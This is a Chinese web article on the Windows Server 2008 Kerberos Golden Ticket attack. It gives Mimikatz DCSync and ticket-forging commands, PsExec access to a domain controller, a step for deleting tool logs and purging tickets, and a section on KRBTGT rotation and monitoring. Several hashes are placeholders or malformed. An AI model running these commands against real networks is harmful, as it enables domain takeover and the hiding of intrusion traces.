ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

Windows Server 2008黄金票据攻击与防御实战解析

Windows Server 2008黄金票据攻击与防御实战解析 1. Windows Server 2008黄金票据攻击全景解析在域渗透测试中黄金票据Golden Ticket攻击一直是最具破坏性的技术手段之一。这种攻击方式允许攻击者在获取域控权限后完全绕过Kerberos认证机制任意伪造域内任何用户的TGTTicket Granting Ticket。我曾在一次企业红队评估中仅用3分钟就通过黄金票据接管了整个Windows Server 2008域环境。黄金票据之所以被称为黄金是因为它具备以下特性不受密码更改影响与银票据不同可自定义有效期最长10年可伪造任意用户权限包括域管理员不需要与域控制器持续交互2. 环境准备与前置条件2.1 实验环境搭建要点建议使用以下环境配置进行测试域控制器Windows Server 2008 R2 SP1需安装KB3033929补丁成员服务器Windows 7/10 加入测试域工具清单Mimikatz 2.2.0x64版本兼容性最佳PsExec 2.4微软官方工具Wireshark 3.6抓包验证流量重要提示所有操作必须在授权环境下进行实验室网络应与生产环境物理隔离2.2 Kerberos基础认知强化理解黄金票据前必须掌握的Kerberos核心要素组件作用黄金票据关联点KDC密钥分发中心被伪造的票据来源KRBTGT域加密密钥攻击获取的核心机密TGT票据授予票据伪造对象PAC特权属性证书权限伪造关键3. 实战操作全流程3.1 获取KRBTGT密码哈希这是最关键的步骤需要已获取域控管理员权限# 使用Mimikatz提取KRBTGT哈希 privilege::debug lsadump::dcsync /domain:test.com /user:krbtgt典型输出示例[DC] test.com will be the domain [DC] DC01.test.com will be the DC server [DC] krbtgt will be the user account Object RDN : krbtgt ** SAM ACCOUNT ** SAM Username : krbtgt User Principal Name : krbtgttest.com NTLM Hash : d3b9850a0a0e4e5a5d4b3c3b8a0a9a73.2 黄金票据生成艺术使用获取的哈希制作黄金票据kerberos::golden /admin:Administrator /domain:test.com /sid:S-1-5-21-123456789-1234567890-123456789 /krbtgt:d3b9850a0a0e4e5a5d4b3c3b8a0a9a7 /id:500 /groups:512 /ptt参数详解/admin伪造的用户名/domain完全限定域名/sid域SID去掉最后部分/krbtgt获取的NTLM哈希/id用户RID500为管理员/groups域管理员组RID/ptt直接注入内存3.3 权限验证与横向移动验证票据是否生效klist # 查看当前会话票据 dir \\dc01.test.com\c$ # 测试访问权限使用PsExec获取系统权限PsExec.exe \\dc01.test.com -s cmd.exe4. 防御措施深度剖析4.1 企业级防护方案防护层面具体措施实施要点密码策略定期更改KRBTGT密码每30天修改1次连续修改2次监控方案异常Kerberos请求检测关注TGT请求时间戳异常系统加固限制域控远程访问仅允许管理终端连接5985/5986补丁管理安装KB2871997限制内存中凭据存储4.2 攻击痕迹清理技巧如需清除实验痕迹klist purge # 清除内存票据 del C:\Windows\Temp\mimikatz.log # 删除工具日志5. 高阶技巧与疑难排错5.1 时间同步问题处理当遇到KRB_AP_ERR_SKEW错误时net time \\dc01.test.com /set /y # 手动同步时间 w32tm /resync # 强制时间服务同步5.2 多域环境处理在子域攻击父域时需注意使用父域的KRBTGT哈希指定父域的完全限定域名获取父域的SID结构kerberos::golden /admin:EnterpriseAdmin /domain:parent.com /sid:S-1-5-21-987654321-9876543210-987654321 /sids:S-1-5-21-123456789-1234567890-123456789-519 /krbtgt:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6 /ptt6. 企业安全建设建议在最近一次金融行业渗透测试中我们发现超过60%的Windows Server 2008环境存在黄金票据攻击风险。建议安全团队立即检查域控上的KRBTGT账户密码最后修改时间部署SIEM规则监控异常Kerberos请求如TGT有效期异常对域管理员会话实施双因素认证定期进行域渗透测试至少每季度一次一个值得分享的实战经验在一次红队行动中我们通过钓鱼攻击获取普通域用户权限后利用MS14-068漏洞快速提升到域管理员最终通过黄金票据实现了权限持久化。整个攻击链仅用时47分钟这凸显了纵深防御体系的重要性。
返回列表